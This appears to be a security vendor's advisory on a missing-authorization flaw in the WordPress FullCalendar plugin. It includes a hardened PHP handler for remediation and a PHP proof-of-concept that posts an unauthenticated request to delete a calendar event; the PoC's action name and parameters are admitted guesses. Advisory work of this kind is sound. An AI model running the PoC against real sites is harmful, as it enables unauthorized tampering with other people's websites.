Atomic Edge analysis of CVE-2026-22351 (metadata-based):
This vulnerability is a Missing Authorization flaw in the WordPress FullCalendar plugin, version 1.6 and earlier. The flaw allows unauthenticated attackers to trigger a privileged plugin function, leading to unauthorized actions. The CVSS score of 5.3 (Medium) reflects a network-accessible attack with low attack complexity that impacts integrity.
Atomic Edge research identifies the root cause as a missing capability check on a WordPress AJAX hook handler. The CWE-862 classification confirms the plugin fails to verify a user's permissions before executing a function. This conclusion is inferred from the vulnerability description and standard WordPress plugin architecture. Without a code diff, the exact function name is unconfirmed, but the pattern is consistent with an `add_action('wp_ajax_nopriv_…')` hook lacking a corresponding user authorization check.
Exploitation involves sending a crafted HTTP POST request to the WordPress AJAX endpoint. The attacker targets `/wp-admin/admin-ajax.php` with an `action` parameter corresponding to the vulnerable plugin function. Based on the plugin slug `wp-fullcalendar`, a likely action parameter is `wpfc_ajax_action` or a similar derivative. The payload would contain parameters required by the underlying function, such as event data or calendar settings, to perform the unauthorized action.
Remediation requires adding a proper capability check to the vulnerable function. The fix should verify the current user has appropriate permissions, typically using `current_user_can()`. The AJAX handler should also be registered only for authenticated users by using `wp_ajax_{action}` instead of `wp_ajax_nopriv_{action}` unless the function is intentionally public. Input validation and nonce verification should also be implemented for defense in depth.
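The remediation pattern described above as a worked example. This is an added, hypothetical handler written for this page, not the plugin's actual code: the hook name `wpfc_delete_event`, the handler function, the nonce action `wpfc_delete_event_nonce` and the `event` post type are all assumed placeholders, since the real handler name is unconfirmed.

```php
<?php
// Added example (hypothetical): a hardened WordPress AJAX handler applying the
// three remediation steps above. All hook, nonce and post-type names are assumed.

// Vulnerable pattern, shown for contrast only: reachable by unauthenticated
// callers and executed without any permission check (CWE-862).
// add_action( 'wp_ajax_nopriv_wpfc_delete_event', 'wpfc_delete_event_handler' );

// Hardened: the privileged action is registered for logged-in users only.
add_action( 'wp_ajax_wpfc_delete_event', 'wpfc_delete_event_handler' );

function wpfc_delete_event_handler() {
    // 1. CSRF defence: the request must carry a nonce issued for this action.
    //    check_ajax_referer() terminates the request itself on failure.
    check_ajax_referer( 'wpfc_delete_event_nonce', 'nonce' );

    // 2. Authorization (the actual fix for CWE-862): verify the caller may
    //    delete this specific post, not merely that they are logged in.
    $event_id = isset( $_POST['event_id'] ) ? absint( $_POST['event_id'] ) : 0;
    if ( ! $event_id || ! current_user_can( 'delete_post', $event_id ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    // 3. Input validation: the target must exist and be an event post
    //    ('event' is an assumed post type for this example).
    $event = get_post( $event_id );
    if ( ! $event || 'event' !== $event->post_type ) {
        wp_send_json_error( array( 'message' => 'Not an event' ), 400 );
    }

    // The privileged operation is reached only after all three checks pass.
    if ( ! wp_delete_post( $event_id, true ) ) {
        wp_send_json_error( array( 'message' => 'Delete failed' ), 500 );
    }
    wp_send_json_success( array( 'deleted' => $event_id ) );
}

// The admin page that issues the request must embed a matching nonce, e.g.:
// wp_localize_script( 'wpfc-admin', 'wpfc',
//     array( 'nonce' => wp_create_nonce( 'wpfc_delete_event_nonce' ) ) );
```

With `wp_ajax_nopriv_` no longer registered, an unauthenticated POST to `admin-ajax.php` for this action receives WordPress's default `0` response instead of reaching the handler, and a logged-in caller without `delete_post` on the event gets a 403 JSON error.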
The direct impact is unauthorized data modification or a site state change. An attacker could delete calendar events, modify event details, or alter plugin settings. The vulnerability does not lead to direct information disclosure or remote code execution based on the CVSS metrics (Confidentiality: None, Integrity: Low, Availability: None). However, unauthorized changes could disrupt site functionality or user experience.
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-22351 - FullCalendar <= 1.6 - Missing Authorization
$target_url = 'http://target-site.com/wp-admin/admin-ajax.php';
// The exact AJAX action is not confirmed from metadata.
// This PoC uses a common pattern derived from the plugin slug.
$likely_action = 'wpfc_ajax_action';
// Assumed parameter based on plugin functionality (calendar event manipulation).
$post_data = array(
    'action'   => $likely_action,
    'method'   => 'deleteEvent', // Example unauthorized action
    'event_id' => '1',           // Example target event ID
    // Other parameters may be required depending on the actual function.
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
echo "HTTP Response Code: $http_code\n";
echo "Response Body: $response\n";
// A successful exploitation attempt may return a specific JSON response.
// Without knowing the exact function, success is inferred from a 200 OK and plugin-specific output.
if ( $http_code == 200 && strpos( $response, 'success' ) !== false ) {
    echo "[+] Potential exploitation successful.\n";
} else {
    echo "[-] Exploitation attempt may have failed or the action parameter is incorrect.\n";
}
?>